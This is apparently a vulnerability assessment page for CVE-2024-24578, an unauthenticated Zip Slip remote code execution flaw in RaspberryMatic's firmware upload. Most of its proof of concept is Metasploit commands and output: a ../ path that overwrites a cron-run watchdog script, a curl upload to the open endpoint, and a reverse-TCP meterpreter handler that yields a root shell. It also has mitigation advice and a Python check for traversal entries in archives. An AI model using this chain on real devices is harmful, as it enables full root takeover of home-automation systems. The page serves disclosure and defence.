Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

CVE-2024-24578

Disclosure Date: March 18, 2024
MITRE ATT&CK tactics: Execution (validated), Initial Access (validated)

Description

RaspberryMatic is an open-source operating system for HomeMatic internet-of-things devices. RaspberryMatic / OCCU prior to version 3.75.6.20240316 contains an unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java-based HMIPServer.jar component. RaspberryMatic includes a Java-based HMIPServer that can be accessed through URLs starting with /pages/jpages. The FirmwareController class, however, does not perform any session id checks, so this feature can be accessed without a valid session. Due to this issue, attackers can gain remote code execution as the root user, allowing a full system compromise. Version 3.75.6.20240316 contains a patch.

Technical Analysis

RaspberryMatic is a free and non-commercial open-source operating system for running a smart-home IoT central that provides connectivity to the homematicIP / HomeMatic hardware line of IoT devices. It can be installed directly on a CCU3 or ELV Charly hardware device. Alternatively, it can be installed on a wide range of freely available single-board computers (SBC) such as a Raspberry Pi, ASUS Tinkerboard or Hardkernel ODROID, or on hardware platforms like an Intel NUC system. Furthermore, it can be run as a virtual appliance in modern virtualization environments (e.g. Proxmox VE, VirtualBox, Synology VMM, Docker/OCI, Kubernetes/K8s, VMware ESXi, etc.).

RaspberryMatic / OCCU contains an unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java-based HMIPServer.jar component. The web UI allows firmware uploads, which can be reached through the URL /pages/jpages/system/DeviceFirmware/addFirmware.
This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be automatically extracted without any further checks. As the archive entries can contain ../ sequences, it is possible to break out of the predefined temp directory and write files to other locations outside this path.

This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files on the main filesystem. It is therefore possible to overwrite the watchdog script in /usr/local/addons/mediola/bin with a malicious payload, which is executed every five minutes through a cron job, whereby attackers gain remote code execution as the root user, allowing a full system compromise.

The full details of this vulnerability can be found in the GHSA-q967-q4j8-637h security disclosure from Jens Maus.

You can easily test this vulnerability by downloading a vulnerable OVA image from here and installing it in VirtualBox or VMware Fusion.

Proof of Concept

  1. Launch Metasploit
  2. Select the zip slip module
  3. Set TARGETPAYLOADPATH to ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog to overwrite the watchdog script with the payload
  4. Run the module
  5. Compress the resulting tar file to .tgz format
  6. Launch a listener
  7. Upload the malicious msf.tgz file using curl
  8. Wait a maximum of five minutes for cron to kick in and run the overwritten watchdog script
  9. Bingo, a meterpreter session should pop up…
msf6 > use exploit/multi/fileformat/zip_slip
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/zip_slip) > options

Module options (exploit/multi/fileformat/zip_slip):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   FILENAME           msf.tar          yes       The name of the archive file
   FTYPE              tar              yes       The archive type (Accepted: tar, zip)
   TARGETPAYLOADPATH  ../payload.bin   yes       The targeted path for payload


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.201.8    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Manually determined


View the full module info with the info, or info -d command.
msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog
TARGETPAYLOADPATH => ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog
msf6 exploit(multi/fileformat/zip_slip) > exploit
[+] msf.tar stored at /root/.msf4/local/msf.tar
[*] When extracted, the payload is expected to extract to:
[*] ../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog
msf6 exploit(multi/fileformat/zip_slip) > gzip /root/.msf4/local/msf.tar
[*] exec: gzip /root/.msf4/local/msf.tar

msf6 exploit(multi/fileformat/zip_slip) > mv /root/.msf4/local/msf.tar.gz /root/.msf4/local/msf.tgz
[*] exec: mv /root/.msf4/local/msf.tar.gz /root/.msf4/local/msf.tgz

msf6 exploit(multi/fileformat/zip_slip) > use multi/handler
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444
msf6 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                            Payload opts
  --  ----                    -------                            ------------
  0   Exploit: multi/handler  linux/x86/meterpreter/reverse_tcp  tcp://0.0.0.0:4444

Upload malicious compressed tar file.

# curl --insecure -H "Content-type: multipart/form-data" -F filename=@/root/.msf4/local/msf.tgz https://192.168.201.6/pages/jpages/system/DeviceFirmware/addFirmware
${addDevFirmwareInfoCorrupt}

Wait five minutes…

msf6 exploit(multi/handler) >
[*] Sending stage (1017704 bytes) to 192.168.201.6
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:47982) at 2025-01-28 21:00:01 +0000

msf6 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                   Information           Connection
  --  ----  ----                   -----------           ----------
  1         meterpreter x86/linux  root @ 192.168.201.6  192.168.201.8:4444 -> 192.168.201.6:47982 (192.168.201.6)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.201.6
OS           :  (Linux 6.1.74)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 15622 created.
Channel 1 created.
uname -a
Linux homematic-raspi 6.1.74 #1 SMP PREEMPT Tue Jan 30 06:46:28 UTC 2024 x86_64 GNU/Linux
exit
meterpreter >

Pretty straightforward, but unfortunately the existing zip-slip module in Metasploit only supports a limited number of payloads.
However, RaspberryMatic is supported on a range of platforms like Raspberry Pi, ASUS Tinkerboard or ODROID, which are all ARM-based single-board computers.
Therefore I developed a separate Metasploit module: PR19841, which covers most of the RaspberryMatic supported architectures and fully automates the attack.

Indicators of Compromise (IOCs)

Unfortunately there is not much to go on in the log files. The only IOC might be the overwritten watchdog script in /usr/local/addons/mediola/bin, which contains a malicious payload. However, the Metasploit module will cover these tracks by restoring the original watchdog script after a successful attack.

Mitigation

RaspberryMatic versions <= 3.73.9.20240130 are vulnerable. Please upgrade your RaspberryMatic installation to the latest version or at least to version 3.75.6.20240316 where this issue has been fixed.

References

CVE-2024-24578
GHSA-q967-q4j8-637h security disclosure
Metasploit Module PR 19841: RaspberryMatic Unauthenticated RCE via Zip Slip

Credits

h0ng10 => discovery of the vulnerability
jens-maus => verifier and remediation
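Added example, not code from the RaspberryMatic project or from the assessment above: a Python check that inspects an uploaded .tgz for members that would land outside the extraction directory, which is the Zip Slip defect the analysis describes (a ../ path escaping the temp directory to reach /usr/local/addons/mediola/bin/watchdog). The archive contents and the /tmp/hmip-extract destination are constructed for the example; nothing is written to disk by the check itself.

```python
import io
import os
import tarfile


def build_sample_tgz() -> bytes:
    """Constructed sample: one benign member plus one Zip Slip member whose
    path mirrors the watchdog overwrite from the analysis (not a real upload)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in [
            ("firmware/update.bin", b"\x00" * 16),
            ("../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog",
             b"#!/bin/sh\n# placeholder body, constructed for the example\n"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def unsafe_entries(tgz_bytes: bytes, dest_dir: str = "/tmp/hmip-extract") -> list:
    """Return member names that would resolve outside dest_dir.

    Each member path (and, for symlinks/hardlinks, its link target) is joined
    to the canonical destination, normalised, and compared with commonpath.
    Absolute names, '..' escapes and links pointing outside are all flagged.
    """
    dest = os.path.realpath(dest_dir)
    flagged = []
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            targets = [member.name]
            if member.islnk() or member.issym():
                targets.append(os.path.join(os.path.dirname(member.name), member.linkname))
            for target in targets:
                resolved = os.path.normpath(os.path.join(dest, target))
                if os.path.commonpath([dest, resolved]) != dest:
                    flagged.append(member.name)
                    break
    return flagged


def extract_safely(tgz_bytes: bytes, dest_dir: str) -> None:
    """Reject the whole archive if any member escapes dest_dir, then extract."""
    bad = unsafe_entries(tgz_bytes, dest_dir)
    if bad:
        raise ValueError(f"refusing archive, path traversal in members: {bad}")
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        tar.extractall(dest_dir)
```

On Python 3.12 and later (and the patch releases that backported PEP 706), `tar.extractall(dest_dir, filter="data")` performs an equivalent rejection of escaping paths in the standard library; the explicit check above is still useful for logging the offending member names before anything touches the filesystem.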


General Information

Vendors

  • jens-maus

Products

  • RaspberryMatic
